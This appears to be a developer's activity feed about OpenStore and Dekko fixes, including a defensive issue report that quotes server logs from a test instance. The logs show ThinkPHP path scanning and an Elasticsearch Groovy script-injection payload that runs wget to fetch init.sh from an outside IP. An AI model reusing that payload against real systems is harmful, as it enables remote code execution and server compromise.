Henrik Schnor (5b763238) at 16 Dec 03:28
You are right! I changed it a bit and added a check whether the array is empty.
Henrik Schnor (5b763238) at 15 Dec 11:48
Check length of lists from Ubuntu One
This addresses openstore-meta#257. See the issue for more info on this.
Henrik Schnor (23331a80) at 15 Dec 00:35
Take first value if Ubuntu One returns a list
Henrik Schnor (fb5fd0b7) at 15 Dec 00:33
Henrik Schnor (fb5fd0b7) at 15 Dec 00:26
Take first value if Ubuntu One returns a list
Ubuntu One returns user data in the /auth/ubuntu/return
callback as arrays now. Probably because they added the option to add multiple email addresses in a Ubuntu One account.
{
"authenticated": true,
"claimedIdentifier": "https://login.ubuntu.com/+id/xxxxxxx",
"nickname": [
"xxxxxx"
],
"email": [
"xxxxxxxxxx@xxxxxx.xx"
],
"fullname": [
"xxxxxxxx xxxxxx"
],
"language": "en",
"http://axschema.org/contact/email": [
"xxxxxxxxxx@xxxxxx.xx"
],
"http://axschema.org/namePerson": [
"xxxxxxxx xxxxxx"
],
"http://axschema.org/namePerson/friendly": [
"xxxxxx"
]
}
I found the following in the logs of my OpenStore test instance:
nginx_1 | 172.18.0.1 - - [14/Dec/2019:20:52:10 +0000] "GET /TP/public/index.php HTTP/1.0" 404 158 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" "202.1
02.90.226"
nginx_1 | 172.18.0.1 - - [14/Dec/2019:20:52:10 +0000] "GET /TP/index.php HTTP/1.0" 404 151 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" "202.102.90.2
26"
nginx_1 | 172.18.0.1 - - [14/Dec/2019:20:52:11 +0000] "GET /thinkphp/html/public/index.php HTTP/1.0" 404 169 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3
.6)" "202.102.90.226"
nginx_1 | 172.18.0.1 - - [14/Dec/2019:20:52:11 +0000] "GET /html/public/index.php HTTP/1.0" 404 160 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" "202
.102.90.226"
nginx_1 | 172.18.0.1 - - [14/Dec/2019:20:52:12 +0000] "GET /public/index.php HTTP/1.0" 404 155 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" "202.102.
90.226"
nginx_1 | 172.18.0.1 - - [14/Dec/2019:20:52:12 +0000] "GET /TP/html/public/index.php HTTP/1.0" 404 163 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" "
202.102.90.226"
nginx_1 | 172.18.0.1 - - [14/Dec/2019:20:52:13 +0000] "GET /elrekt.php HTTP/1.0" 404 149 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" "202.102.90.226
"
nginx_1 | 172.18.0.1 - - [14/Dec/2019:20:52:13 +0000] "GET /index.php HTTP/1.0" 404 148 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" "202.102.90.226"
nginx_1 | 172.18.0.1 - - [14/Dec/2019:20:52:14 +0000] "GET / HTTP/1.0" 200 2192 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" "202.102.90.226"
elasticsearch_1 | [2019-12-14 20:52:14,551][DEBUG][action.search ] [Lady Lotus] [openstore_packages][0], node[iXRf7ln5S7akFWtQ9j7_xQ], [P], v[2], s[STARTED], a[id=KYww8tmdRUWcYbRT0UiM8g]: Fail
ed to execute [org.elasticsearch.action.search.SearchRequest@cbe04f3] lastShard [true]
elasticsearch_1 | RemoteTransportException[[Lady Lotus][172.18.0.6:9300][indices:data/read/search[phase/query]]]; nested: SearchParseException[failed to parse search source [{"size":1, "script_fields": {
"lupin":{"script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"wget http://185.181.10.234/E5DB0E07C3D7BE80V520/init.sh -P /tmp/sssooo\").getText()"}}}]]; nested: ScriptExcepti
on[scripts of type [inline], operation [search] and lang [groovy] are disabled];
elasticsearch_1 | Caused by: SearchParseException[failed to parse search source [{"size":1, "script_fields": {"lupin":{"script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"w
get http://185.181.10.234/E5DB0E07C3D7BE80V520/init.sh -P /tmp/sssooo\").getText()"}}}]]; nested: ScriptException[scripts of type [inline], operation [search] and lang [groovy] are disabled];
elasticsearch_1 | at org.elasticsearch.search.SearchService.parseSource(SearchService.java:873)
elasticsearch_1 | at org.elasticsearch.search.SearchService.createContext(SearchService.java:667)
elasticsearch_1 | at org.elasticsearch.search.SearchService.createAndPutContext(SearchService.java:633)
elasticsearch_1 | at org.elasticsearch.search.SearchService.executeQueryPhase(SearchService.java:377)
elasticsearch_1 | at org.elasticsearch.search.action.SearchServiceTransportAction$SearchQueryTransportHandler.messageReceived(SearchServiceTransportAction.java:368)
elasticsearch_1 | at org.elasticsearch.search.action.SearchServiceTransportAction$SearchQueryTransportHandler.messageReceived(SearchServiceTransportAction.java:365)
elasticsearch_1 | at org.elasticsearch.transport.TransportRequestHandler.messageReceived(TransportRequestHandler.java:33)
elasticsearch_1 | at org.elasticsearch.transport.RequestHandlerRegistry.processMessageReceived(RequestHandlerRegistry.java:77)
elasticsearch_1 | at org.elasticsearch.transport.TransportService$4.doRun(TransportService.java:378)
elasticsearch_1 | at org.elasticsearch.common.util.concurrent.AbstractRunnable.run(AbstractRunnable.java:37)
elasticsearch_1 | at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
elasticsearch_1 | at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
elasticsearch_1 | at java.lang.Thread.run(Thread.java:748)
elasticsearch_1 | Caused by: ScriptException[scripts of type [inline], operation [search] and lang [groovy] are disabled]
elasticsearch_1 | at org.elasticsearch.script.ScriptService.compile(ScriptService.java:244)
elasticsearch_1 | at org.elasticsearch.script.ScriptService.search(ScriptService.java:456)
elasticsearch_1 | at org.elasticsearch.search.fetch.script.ScriptFieldsParseElement.parse(ScriptFieldsParseElement.java:102)
elasticsearch_1 | at org.elasticsearch.search.SearchService.parseSource(SearchService.java:856)
elasticsearch_1 | ... 12 more
elasticsearch_1 | [2019-12-14 20:52:14,552][DEBUG][action.search ] [Lady Lotus] [openstore_packages][1], node[iXRf7ln5S7akFWtQ9j7_xQ], [P], v[2], s[STARTED], a[id=62YBB9u5SSyhUPxAVXM6EQ]: Fail
ed to execute [org.elasticsearch.action.search.SearchRequest@cbe04f3] lastShard [true]
elasticsearch_1 | RemoteTransportException[[Lady Lotus][172.18.0.6:9300][indices:data/read/search[phase/query]]]; nested: SearchParseException[failed to parse search source [{"size":1, "script_fields": {
"lupin":{"script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"wget http://185.181.10.234/E5DB0E07C3D7BE80V520/init.sh -P /tmp/sssooo\").getText()"}}}]]; nested: ScriptExcepti
on[scripts of type [inline], operation [search] and lang [groovy] are disabled];
elasticsearch_1 | Caused by: SearchParseException[failed to parse search source [{"size":1, "script_fields": {"lupin":{"script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"w
get http://185.181.10.234/E5DB0E07C3D7BE80V520/init.sh -P /tmp/sssooo\").getText()"}}}]]; nested: ScriptException[scripts of type [inline], operation [search] and lang [groovy] are disabled];
elasticsearch_1 | at org.elasticsearch.search.SearchService.parseSource(SearchService.java:873)
elasticsearch_1 | at org.elasticsearch.search.SearchService.createContext(SearchService.java:667)
elasticsearch_1 | at org.elasticsearch.search.SearchService.createAndPutContext(SearchService.java:633)
elasticsearch_1 | at org.elasticsearch.search.SearchService.executeQueryPhase(SearchService.java:377)
elasticsearch_1 | at org.elasticsearch.search.action.SearchServiceTransportAction$SearchQueryTransportHandler.messageReceived(SearchServiceTransportAction.java:368)
elasticsearch_1 | at org.elasticsearch.search.action.SearchServiceTransportAction$SearchQueryTransportHandler.messageReceived(SearchServiceTransportAction.java:365)
elasticsearch_1 | at org.elasticsearch.transport.TransportRequestHandler.messageReceived(TransportRequestHandler.java:33)
elasticsearch_1 | at org.elasticsearch.transport.RequestHandlerRegistry.processMessageReceived(RequestHandlerRegistry.java:77)
elasticsearch_1 | at org.elasticsearch.transport.TransportService$4.doRun(TransportService.java:378)
elasticsearch_1 | at org.elasticsearch.common.util.concurrent.AbstractRunnable.run(AbstractRunnable.java:37)
elasticsearch_1 | at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
elasticsearch_1 | at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
elasticsearch_1 | at java.lang.Thread.run(Thread.java:748)
elasticsearch_1 | Caused by: ScriptException[scripts of type [inline], operation [search] and lang [groovy] are disabled]
elasticsearch_1 | at org.elasticsearch.script.ScriptService.compile(ScriptService.java:244)
elasticsearch_1 | at org.elasticsearch.script.ScriptService.search(ScriptService.java:456)
elasticsearch_1 | at org.elasticsearch.search.fetch.script.ScriptFieldsParseElement.parse(ScriptFieldsParseElement.java:102)
elasticsearch_1 | at org.elasticsearch.search.SearchService.parseSource(SearchService.java:856)
elasticsearch_1 | ... 12 more
There is more of that. If you need the log, let me know. Elasticsearch apparetly has a feature to provide scripts in queries (which luckily seems to be disabled by default). Nevertheless it might make sense to restrict input that gets passed to elasticsearch, if only to reduce the attack surface.
Henrik Schnor (c4564f25) at 01 Sep 16:41
Fixed the size of the search indicator (see dekkoproject/dekko#143) and changed it's position. The submodule reference in the main dekko project will also need to be updated.
Fixed the size of the search indicator (see dekko#143) and changed it's position. The submodule reference in the main dekko project will also need to be updated.
Fixed the size of the search indicator (see dekko#143) and changed it's position. The submodule reference in the main dekko project will also need to be updated.
Henrik Schnor (c4564f25) at 31 Aug 10:10
Changed location and size of the search indicator
Henrik Schnor (a0a1982a) at 31 Aug 10:02